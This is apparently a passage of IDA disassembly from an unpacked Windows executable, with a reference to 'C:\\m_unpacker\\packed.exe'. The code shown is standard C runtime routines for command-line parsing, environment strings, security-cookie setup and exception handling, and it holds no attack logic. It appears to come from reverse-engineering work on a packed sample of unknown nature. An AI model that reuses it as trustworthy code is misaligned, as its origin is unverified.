loc_40B132: ; CODE XREF: sub_40B06B+BCj
inc dword ptr [ecx]
loc_40B134: ; CODE XREF: sub_40B06B+16Ej
xor ebx, ebx
inc ebx
xor ecx, ecx
jmp short loc_40B13D
; ---------------------------------------------------------------------------
loc_40B13B: ; CODE XREF: sub_40B06B+D5j
inc esi
inc ecx
loc_40B13D: ; CODE XREF: sub_40B06B+CEj
cmp byte ptr [esi], 5Ch
jz short loc_40B13B
cmp byte ptr [esi], 22h
jnz short loc_40B16D
test cl, 1
jnz short loc_40B16B
cmp [ebp+var_4], 0
jz short loc_40B15E
lea eax, [esi+1]
cmp byte ptr [eax], 22h
jnz short loc_40B15E
mov esi, eax
jmp short loc_40B16B
; ---------------------------------------------------------------------------
loc_40B15E: ; CODE XREF: sub_40B06B+E5j
; sub_40B06B+EDj
xor eax, eax
xor ebx, ebx
cmp [ebp+var_4], eax
setz al
mov [ebp+var_4], eax
loc_40B16B: ; CODE XREF: sub_40B06B+DFj
; sub_40B06B+F1j
shr ecx, 1
loc_40B16D: ; CODE XREF: sub_40B06B+DAj
test ecx, ecx
jz short loc_40B183
loc_40B171: ; CODE XREF: sub_40B06B+113j
dec ecx
test edx, edx
jz short loc_40B17A
mov byte ptr [edx], 5Ch
inc edx
loc_40B17A: ; CODE XREF: sub_40B06B+109j
inc dword ptr [edi]
test ecx, ecx
jnz short loc_40B171
mov [ebp+arg_4], edx
loc_40B183: ; CODE XREF: sub_40B06B+104j
mov al, [esi]
test al, al
jz short loc_40B1DE
cmp [ebp+var_4], 0
jnz short loc_40B197
cmp al, 20h
jz short loc_40B1DE
cmp al, 9
jz short loc_40B1DE
loc_40B197: ; CODE XREF: sub_40B06B+122j
test ebx, ebx
jz short loc_40B1D8
test edx, edx
movsx eax, al
push eax
jz short loc_40B1C6
call sub_41054E
test eax, eax
pop ecx
jz short loc_40B1BA
mov al, [esi]
mov ecx, [ebp+arg_4]
inc [ebp+arg_4]
mov [ecx], al
inc esi
inc dword ptr [edi]
loc_40B1BA: ; CODE XREF: sub_40B06B+140j
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
jmp short loc_40B1D3
; ---------------------------------------------------------------------------
loc_40B1C6: ; CODE XREF: sub_40B06B+136j
call sub_41054E
test eax, eax
pop ecx
jz short loc_40B1D3
inc esi
inc dword ptr [edi]
loc_40B1D3: ; CODE XREF: sub_40B06B+159j
; sub_40B06B+163j
inc dword ptr [edi]
mov edx, [ebp+arg_4]
loc_40B1D8: ; CODE XREF: sub_40B06B+12Ej
inc esi
jmp loc_40B134
; ---------------------------------------------------------------------------
loc_40B1DE: ; CODE XREF: sub_40B06B+11Cj
; sub_40B06B+126j ...
test edx, edx
jz short loc_40B1E9
mov byte ptr [edx], 0
inc edx
mov [ebp+arg_4], edx
loc_40B1E9: ; CODE XREF: sub_40B06B+175j
inc dword ptr [edi]
mov ecx, [ebp+arg_8]
jmp loc_40B101
; ---------------------------------------------------------------------------
loc_40B1F3: ; CODE XREF: sub_40B06B+99j
; sub_40B06B+B2j
mov eax, [ebp+arg_0]
test eax, eax
pop esi
pop ebx
jz short loc_40B1FF
and dword ptr [eax], 0
loc_40B1FF: ; CODE XREF: sub_40B06B+18Fj
inc dword ptr [ecx]
leave
retn
sub_40B06B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B203 proc near ; CODE XREF: sub_4044D2-BEp
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
cmp dword_436954, ebx
push esi
push edi
jnz short loc_40B21B
call sub_4051B3
loc_40B21B: ; CODE XREF: sub_40B203+11j
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push ebx
mov byte_427F5C, bl
call ds:dword_41D060 ; GetModuleFileNameA
mov eax, dword_436978
cmp eax, ebx
mov off_427B08, esi
jz short loc_40B249
cmp [eax], bl
mov [ebp+var_4], eax
jnz short loc_40B24C
loc_40B249: ; CODE XREF: sub_40B203+3Dj
mov [ebp+var_4], esi
loc_40B24C: ; CODE XREF: sub_40B203+44j
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
lea edi, [ebp+var_C]
call sub_40B06B
mov eax, [ebp+var_8]
add esp, 0Ch
cmp eax, 3FFFFFFFh
jnb short loc_40B2B4
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnb short loc_40B2B4
mov edi, eax
shl edi, 2
lea eax, [edi+ecx]
cmp eax, ecx
jb short loc_40B2B4
push eax
call sub_407AEA
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_40B2B4
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
add edi, esi
push edi
push esi
lea edi, [ebp+var_C]
call sub_40B06B
mov eax, [ebp+var_8]
add esp, 0Ch
dec eax
mov dword_427AEC, eax
mov dword_427AF0, esi
xor eax, eax
jmp short loc_40B2B7
; ---------------------------------------------------------------------------
loc_40B2B4: ; CODE XREF: sub_40B203+65j
; sub_40B203+6Dj ...
or eax, 0FFFFFFFFh
loc_40B2B7: ; CODE XREF: sub_40B203+AFj
pop edi
pop esi
pop ebx
leave
retn
sub_40B203 endp
; =============== S U B R O U T I N E =======================================
sub_40B2BC proc near ; CODE XREF: sub_4044D2-C8p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_427F60
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_41D130
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_40B305
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_40B2EC
mov dword_427F60, 1
jmp short loc_40B30E
; ---------------------------------------------------------------------------
loc_40B2EC: ; CODE XREF: sub_40B2BC+22j
call ds:dword_41D0EC ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40B300
mov eax, ebp
mov dword_427F60, eax
jmp short loc_40B305
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40B2BC+39j
mov eax, dword_427F60
loc_40B305: ; CODE XREF: sub_40B2BC+1Aj
; sub_40B2BC+42j
cmp eax, 1
jnz loc_40B392
loc_40B30E: ; CODE XREF: sub_40B2BC+2Ej
cmp esi, ebx
jnz short loc_40B321
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jnz short loc_40B321
loc_40B31A: ; CODE XREF: sub_40B2BC+DCj
; sub_40B2BC+E8j ...
xor eax, eax
jmp loc_40B3EA
; ---------------------------------------------------------------------------
loc_40B321: ; CODE XREF: sub_40B2BC+54j
; sub_40B2BC+5Cj
cmp [esi], bx
mov eax, esi
jz short loc_40B336
loc_40B328: ; CODE XREF: sub_40B2BC+71j
; sub_40B2BC+78j
add eax, ebp
cmp [eax], bx
jnz short loc_40B328
add eax, ebp
cmp [eax], bx
jnz short loc_40B328
loc_40B336: ; CODE XREF: sub_40B2BC+6Aj
mov edi, ds:dword_41D134
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_40B387
push ebp
call sub_407AEA
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_40B387
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40B383
push [esp+18h+var_8]
call sub_4039CF
pop ecx
mov [esp+18h+var_8], ebx
loc_40B383: ; CODE XREF: sub_40B2BC+B7j
mov ebx, [esp+18h+var_8]
loc_40B387: ; CODE XREF: sub_40B2BC+97j
; sub_40B2BC+A6j
push esi
call ds:dword_41D138 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_40B3EA
; ---------------------------------------------------------------------------
loc_40B392: ; CODE XREF: sub_40B2BC+4Cj
cmp eax, ebp
jz short loc_40B39A
cmp eax, ebx
jnz short loc_40B31A
loc_40B39A: ; CODE XREF: sub_40B2BC+D8j
call ds:off_41D13C
mov esi, eax
cmp esi, ebx
jz loc_40B31A
cmp [esi], bl
jz short loc_40B3B8
loc_40B3AE: ; CODE XREF: sub_40B2BC+F5j
; sub_40B2BC+FAj
inc eax
cmp [eax], bl
jnz short loc_40B3AE
inc eax
cmp [eax], bl
jnz short loc_40B3AE
loc_40B3B8: ; CODE XREF: sub_40B2BC+F0j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_407AEA
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_40B3D6
push esi
call ds:off_41D140
jmp loc_40B31A
; ---------------------------------------------------------------------------
loc_40B3D6: ; CODE XREF: sub_40B2BC+10Cj
push ebp
push esi
push edi
call sub_407FA0
add esp, 0Ch
push esi
call ds:off_41D140
mov eax, edi
loc_40B3EA: ; CODE XREF: sub_40B2BC+60j
; sub_40B2BC+D4j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_40B2BC endp
; =============== S U B R O U T I N E =======================================
sub_40B3F1 proc near ; CODE XREF: sub_4044D2:loc_4043E6p
push esi
push edi
mov eax, offset dword_4215D0
mov edi, offset dword_4215D0
cmp eax, edi
mov esi, eax
jnb short loc_40B412
loc_40B403: ; CODE XREF: sub_40B3F1+1Fj
mov eax, [esi]
test eax, eax
jz short loc_40B40B
call eax
loc_40B40B: ; CODE XREF: sub_40B3F1+16j
add esi, 4
cmp esi, edi
jb short loc_40B403
loc_40B412: ; CODE XREF: sub_40B3F1+10j
pop edi
pop esi
retn
sub_40B3F1 endp
; =============== S U B R O U T I N E =======================================
sub_40B415 proc near ; DATA XREF: sub_407D29+3Fo
push esi
push edi
mov eax, offset dword_4215D8
mov edi, offset dword_4215D8
cmp eax, edi
mov esi, eax
jnb short loc_40B436
loc_40B427: ; CODE XREF: sub_40B415+1Fj
mov eax, [esi]
test eax, eax
jz short loc_40B42F
call eax
loc_40B42F: ; CODE XREF: sub_40B415+16j
add esi, 4
cmp esi, edi
jb short loc_40B427
loc_40B436: ; CODE XREF: sub_40B415+10j
pop edi
pop esi
retn
sub_40B415 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B439 proc near ; CODE XREF: sub_4044D2p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_423064
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push edi
mov edi, 0BB40E64Eh
cmp eax, edi
mov ebx, 0FFFF0000h
jz short loc_40B469
test eax, ebx
jz short loc_40B469
not eax
mov dword_423068, eax
jmp short loc_40B4C9
; ---------------------------------------------------------------------------
loc_40B469: ; CODE XREF: sub_40B439+21j
; sub_40B439+25j
push esi
lea eax, [ebp+var_8]
push eax
call ds:off_41D1A0
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_41D194 ; GetCurrentProcessId
xor esi, eax
call ds:dword_41D0DC ; GetCurrentThreadId
xor esi, eax
call ds:dword_41D104 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058 ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
cmp esi, edi
jnz short loc_40B4AF
mov esi, 0BB40E64Fh
jmp short loc_40B4BA
; ---------------------------------------------------------------------------
loc_40B4AF: ; CODE XREF: sub_40B439+6Dj
test esi, ebx
jnz short loc_40B4BA
mov eax, esi
shl eax, 10h
or esi, eax
loc_40B4BA: ; CODE XREF: sub_40B439+74j
; sub_40B439+78j
mov dword_423064, esi
not esi
mov dword_423068, esi
pop esi
loc_40B4C9: ; CODE XREF: sub_40B439+2Ej
pop edi
pop ebx
leave
retn
sub_40B439 endp
; =============== S U B R O U T I N E =======================================
sub_40B4CD proc near ; DATA XREF: sub_40B539o
; .data:00423060o ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
mov eax, [edi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B506
cmp dword ptr [eax+10h], 3
jnz short loc_40B506
mov eax, [eax+14h]
cmp eax, 19930520h
jz short loc_40B501
cmp eax, 19930521h
jz short loc_40B501
cmp eax, 19930522h
jz short loc_40B501
cmp eax, 1994000h
jnz short loc_40B506
loc_40B501: ; CODE XREF: sub_40B4CD+1Dj
; sub_40B4CD+24j ...
call sub_40C208
loc_40B506: ; CODE XREF: sub_40B4CD+Dj
; sub_40B4CD+13j ...
cmp byte_427F68, 0
push esi
jz short loc_40B532
push dword_427F64
call sub_405543
mov esi, eax
test esi, esi
pop ecx
jz short loc_40B532
push esi
call sub_410561
test eax, eax
pop ecx
jz short loc_40B532
push edi
call esi
jmp short loc_40B534
; ---------------------------------------------------------------------------
loc_40B532: ; CODE XREF: sub_40B4CD+41j
; sub_40B4CD+53j ...
xor eax, eax
loc_40B534: ; CODE XREF: sub_40B4CD+63j
pop esi
pop edi
retn 4
sub_40B4CD endp
; =============== S U B R O U T I N E =======================================
sub_40B539 proc near ; DATA XREF: fabskl8p:0041D2E8o
push offset sub_40B4CD
call ds:dword_41D19C ; SetUnhandledExceptionFilter
push eax
call sub_4054D7
mov dword_427F64, eax
pop ecx
mov byte_427F68, 1
xor eax, eax
retn
sub_40B539 endp
; =============== S U B R O U T I N E =======================================
sub_40B55A proc near ; DATA XREF: fabskl8p:0041D304o
cmp byte_427F68, 0
jz short locret_40B57D
push dword_427F64
call sub_405543
pop ecx
push eax
call ds:dword_41D19C ; SetUnhandledExceptionFilter
mov byte_427F68, 0
locret_40B57D: ; CODE XREF: sub_40B55A+7j
retn
sub_40B55A endp
; =============== S U B R O U T I N E =======================================
sub_40B57E proc near ; DATA XREF: fabskl8p:00421A28o
mov dword ptr [ecx], offset off_41DC34
jmp sub_403096
sub_40B57E endp
; ---------------------------------------------------------------------------
loc_40B589: ; DATA XREF: fabskl8p:off_41DC34o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41DC34
call sub_403096
test byte ptr [esp+8], 1
jz short loc_40B5A5
push esi
call sub_403339
pop ecx
loc_40B5A5: ; CODE XREF: .text:0040B59Cj
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40B5AB proc near ; CODE XREF: sub_40B7EA+4Ep
; sub_40BDB6+21Ap
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_40B601
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_40B601
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_40B5DF
add ecx, 8
push ecx
push edx
call sub_408380
test eax, eax
pop ecx
pop ecx
jz short loc_40B5DF
loc_40B5DB: ; CODE XREF: sub_40B5AB+3Cj
; sub_40B5AB+4Bj ...
xor eax, eax
jmp short loc_40B604
; ---------------------------------------------------------------------------
loc_40B5DF: ; CODE XREF: sub_40B5AB+1Ej
; sub_40B5AB+2Ej
test byte ptr [esi], 2
jz short loc_40B5E9
test byte ptr [edi], 8
jz short loc_40B5DB
loc_40B5E9: ; CODE XREF: sub_40B5AB+37j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_40B5F8
test byte ptr [edi], 1
jz short loc_40B5DB
loc_40B5F8: ; CODE XREF: sub_40B5AB+46j
test al, 2
jz short loc_40B601
test byte ptr [edi], 2
jz short loc_40B5DB
loc_40B601: ; CODE XREF: sub_40B5AB+Bj
; sub_40B5AB+13j ...
xor eax, eax
inc eax
loc_40B604: ; CODE XREF: sub_40B5AB+32j
pop edi
pop esi
retn
sub_40B5AB endp
; =============== S U B R O U T I N E =======================================
sub_40B607 proc near ; CODE XREF: sub_40B64B+85p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0E0434F4Dh
jz short loc_40B62E
cmp eax, 0E06D7363h
jnz short loc_40B648
call sub_40574D
and dword ptr [eax+90h], 0
jmp sub_40C208
; ---------------------------------------------------------------------------
loc_40B62E: ; CODE XREF: sub_40B607+Dj
call sub_40574D
cmp dword ptr [eax+90h], 0
jle short loc_40B648
call sub_40574D
add eax, 90h
dec dword ptr [eax]
loc_40B648: ; CODE XREF: sub_40B607+14j
; sub_40B607+33j
xor eax, eax
retn
sub_40B607 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B64B proc near ; CODE XREF: sub_40B8AC+ECp
; sub_40BC58+36p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset dword_421920
call __SEH_prolog4
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
cmp dword ptr [edi+4], 80h
jg short loc_40B66C
movsx esi, byte ptr [ebx+8]
jmp short loc_40B66F
; ---------------------------------------------------------------------------
loc_40B66C: ; CODE XREF: sub_40B64B+19j
mov esi, [ebx+8]
loc_40B66F: ; CODE XREF: sub_40B64B+1Fj
mov [ebp+var_1C], esi
call sub_40574D
add eax, 90h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
loc_40B682: ; CODE XREF: sub_40B64B+9Fj
cmp esi, [ebp+arg_C]
jz short loc_40B6EC
cmp esi, 0FFFFFFFFh
jle short loc_40B691
cmp esi, [edi+4]
jl short loc_40B696
loc_40B691: ; CODE XREF: sub_40B64B+3Fj
call sub_40C254
loc_40B696: ; CODE XREF: sub_40B64B+44j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_40B6C7
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_40C2A0
loc_40B6C7: ; CODE XREF: sub_40B64B+65j
and [ebp+ms_exc.disabled], 0
jmp short loc_40B6E7
; ---------------------------------------------------------------------------
loc_40B6CD: ; DATA XREF: fabskl8p:00421940o
push [ebp+ms_exc.exc_ptr]
call sub_40B607
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40B6D7: ; DATA XREF: fabskl8p:00421944o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_40B6E7: ; CODE XREF: sub_40B64B+80j
mov [ebp+var_1C], esi
jmp short loc_40B682
; ---------------------------------------------------------------------------
loc_40B6EC: ; CODE XREF: sub_40B64B+3Aj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40B711
cmp esi, [ebp+arg_C]
jz short loc_40B702
call sub_40C254
loc_40B702: ; CODE XREF: sub_40B64B+B0j
mov [ebx+8], esi
call __SEH_epilog4
retn
sub_40B64B endp
; =============== S U B R O U T I N E =======================================
sub_40B70B proc near ; DATA XREF: fabskl8p:00421938o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_40B70B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B711 proc near ; CODE XREF: sub_40B64B+A8p
call sub_40574D
cmp dword ptr [eax+90h], 0
jle short locret_40B72B
call sub_40574D
add eax, 90h
dec dword ptr [eax]
locret_40B72B: ; CODE XREF: sub_40B711+Cj
retn
sub_40B711 endp
; =============== S U B R O U T I N E =======================================
sub_40B72C proc near ; CODE XREF: sub_40B8AC+93p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B76E
cmp dword ptr [eax+10h], 3
jnz short loc_40B76E
mov ecx, [eax+14h]
cmp ecx, 19930520h
jz short loc_40B757
cmp ecx, 19930521h
jz short loc_40B757
cmp ecx, 19930522h
jnz short loc_40B76E
loc_40B757: ; CODE XREF: sub_40B72C+19j
; sub_40B72C+21j
cmp dword ptr [eax+1Ch], 0
jnz short loc_40B76E
call sub_40574D
xor ecx, ecx
inc ecx
mov [eax+20Ch], ecx
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40B76E: ; CODE XREF: sub_40B72C+8j
; sub_40B72C+Ej ...
xor eax, eax
retn
sub_40B72C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B771 proc near ; CODE XREF: sub_4069F0+112p
; sub_40B9D2+6Ep ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421948
call __SEH_prolog4
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short loc_40B7AE
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40B7AE
mov eax, [ecx+1Ch]
test eax, eax
jz short loc_40B7AE
mov eax, [eax+4]
test eax, eax
jz short loc_40B7AE
and [ebp+ms_exc.disabled], 0
push eax
push dword ptr [ecx+18h]
call sub_4045E5
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40B7AE: ; CODE XREF: sub_40B771+11j
; sub_40B771+19j ...
call __SEH_epilog4
retn
sub_40B771 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40C208
; =============== S U B R O U T I N E =======================================
sub_40B7C5 proc near ; CODE XREF: sub_40BA48+86p
; sub_40BA48+113p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [ecx]
push esi
mov esi, [esp+4+arg_0]
add eax, esi
cmp dword ptr [ecx+4], 0
jl short loc_40B7E8
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_40B7E8: ; CODE XREF: sub_40B7C5+11j
pop esi
retn
sub_40B7C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7EA proc near ; CODE XREF: sub_40BDB6+111p
; sub_40BDB6+2AEp
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
test edi, edi
jnz short loc_40B7FE
call sub_40C254
jmp sub_40C208
; ---------------------------------------------------------------------------
loc_40B7FE: ; CODE XREF: sub_40B7EA+8j
and [ebp+var_8], 0
cmp dword ptr [edi], 0
mov [ebp+var_1], 0
jle short loc_40B85E
push ebx
push esi
loc_40B80D: ; CODE XREF: sub_40B7EA+70j
mov eax, [ebp+arg_0]
mov eax, [eax+1Ch]
mov eax, [eax+0Ch]
mov ebx, [eax]
test ebx, ebx
lea esi, [eax+4]
jle short loc_40B852
mov eax, [ebp+var_8]
shl eax, 4
mov [ebp+var_C], eax
loc_40B828: ; CODE XREF: sub_40B7EA+60j
mov ecx, [ebp+arg_0]
push dword ptr [ecx+1Ch]
mov eax, [esi]
push eax
mov eax, [edi+4]
add eax, [ebp+var_C]
push eax
call sub_40B5AB
add esp, 0Ch
test eax, eax
jnz short loc_40B84E
dec ebx
add esi, 4
test ebx, ebx
jg short loc_40B828
jmp short loc_40B852
; ---------------------------------------------------------------------------
loc_40B84E: ; CODE XREF: sub_40B7EA+58j
mov [ebp+var_1], 1
loc_40B852: ; CODE XREF: sub_40B7EA+33j
; sub_40B7EA+62j
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [edi]
jl short loc_40B80D
pop esi
pop ebx
loc_40B85E: ; CODE XREF: sub_40B7EA+1Fj
mov al, [ebp+var_1]
leave
retn
sub_40B7EA endp
; =============== S U B R O U T I N E =======================================
sub_40B863 proc near ; CODE XREF: sub_40BDB6+30Ap
push 4
mov eax, offset loc_41C8FE
call sub_4049AF
call sub_40574D
cmp dword ptr [eax+94h], 0
jz short loc_40B882
call sub_40C254
loc_40B882: ; CODE XREF: sub_40B863+18j
and dword ptr [ebp-4], 0
call sub_40C241
or dword ptr [ebp-4], 0FFFFFFFFh
jmp sub_40C208
sub_40B863 endp
; =============== S U B R O U T I N E =======================================
sub_40B894 proc near ; DATA XREF: fabskl8p:00421970o
call sub_40574D
mov ecx, [ebp+8]
push 0
push 0
mov [eax+94h], ecx
call sub_40456B
int 3 ; Trap to Debugger
sub_40B894 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8AC proc near ; CODE XREF: sub_40BC58+57p
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0040B9C7 SIZE 00000005 BYTES
push 2Ch
push offset dword_4219C0
call __SEH_prolog4
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_34], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_3C]
push eax
call sub_404889
pop ecx
pop ecx
mov [ebp+var_28], eax
call sub_40574D
mov eax, [eax+88h]
mov [ebp+var_2C], eax
call sub_40574D
mov eax, [eax+8Ch]
mov [ebp+var_30], eax
call sub_40574D
mov [eax+88h], esi
call sub_40574D
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
and [ebp+ms_exc.disabled], 0
xor eax, eax
inc eax
mov [ebp+arg_8], eax
mov [ebp+ms_exc.disabled], eax
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_40491E
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp short loc_40B9AB
; ---------------------------------------------------------------------------
loc_40B93C: ; DATA XREF: fabskl8p:004219E0o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_40B72C
retn
; ---------------------------------------------------------------------------
loc_40B945: ; DATA XREF: fabskl8p:004219E4o
mov esp, [ebp+ms_exc.old_esp]
call sub_40574D
and dword ptr [eax+20Ch], 0
mov esi, [ebp+arg_C]
mov edi, [ebp+arg_4]
cmp dword ptr [esi+4], 80h
jg short loc_40B969
movsx ecx, byte ptr [edi+8]
jmp short loc_40B96C
; ---------------------------------------------------------------------------
loc_40B969: ; CODE XREF: sub_40B8AC+B5j
mov ecx, [edi+8]
loc_40B96C: ; CODE XREF: sub_40B8AC+BBj
mov ebx, [esi+10h]
and [ebp+var_20], 0
loc_40B973: ; CODE XREF: sub_40B8AC+11Ej
mov eax, [ebp+var_20]
cmp eax, [esi+0Ch]
jnb short loc_40B993
imul eax, 14h
add eax, ebx
mov edx, [eax+4]
cmp ecx, edx
jle short loc_40B9C7
cmp ecx, [eax+8]
jg short loc_40B9C7
mov eax, [esi+8]
mov ecx, [eax+edx*8+8]
loc_40B993: ; CODE XREF: sub_40B8AC+CDj
push ecx
push esi
push 0
push edi
call sub_40B64B
add esp, 10h
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
loc_40B9AB: ; CODE XREF: sub_40B8AC+8Ej
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov [ebp+arg_8], 0
call sub_40B9D2
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40B8AC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B8AC
loc_40B9C7: ; CODE XREF: sub_40B8AC+D9j
; sub_40B8AC+DEj
inc [ebp+var_20]
jmp short loc_40B973
; END OF FUNCTION CHUNK FOR sub_40B8AC
; =============== S U B R O U T I N E =======================================
sub_40B9CC proc near ; DATA XREF: fabskl8p:004219D8o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_40B9CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B9D2 proc near ; CODE XREF: sub_40B8AC+10Dp
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-28h]
call sub_4048D2
pop ecx
call sub_40574D
mov ecx, [ebp-2Ch]
mov [eax+88h], ecx
call sub_40574D
mov ecx, [ebp-30h]
mov [eax+8Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_40BA47
cmp dword ptr [esi+10h], 3
jnz short locret_40BA47
mov eax, [esi+14h]
cmp eax, 19930520h
jz short loc_40BA23
cmp eax, 19930521h
jz short loc_40BA23
cmp eax, 19930522h
jnz short locret_40BA47
loc_40BA23: ; CODE XREF: sub_40B9D2+41j
; sub_40B9D2+48j
cmp dword ptr [ebp-34h], 0
jnz short locret_40BA47
cmp dword ptr [ebp-1Ch], 0
jz short locret_40BA47
push dword ptr [esi+18h]
call sub_4048B1
pop ecx
test eax, eax
jz short locret_40BA47
push dword ptr [ebp+10h]
push esi
call sub_40B771
pop ecx
pop ecx
locret_40BA47: ; CODE XREF: sub_40B9D2+31j
; sub_40B9D2+37j ...
retn
sub_40B9D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA48 proc near ; CODE XREF: sub_40BBC7+36p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
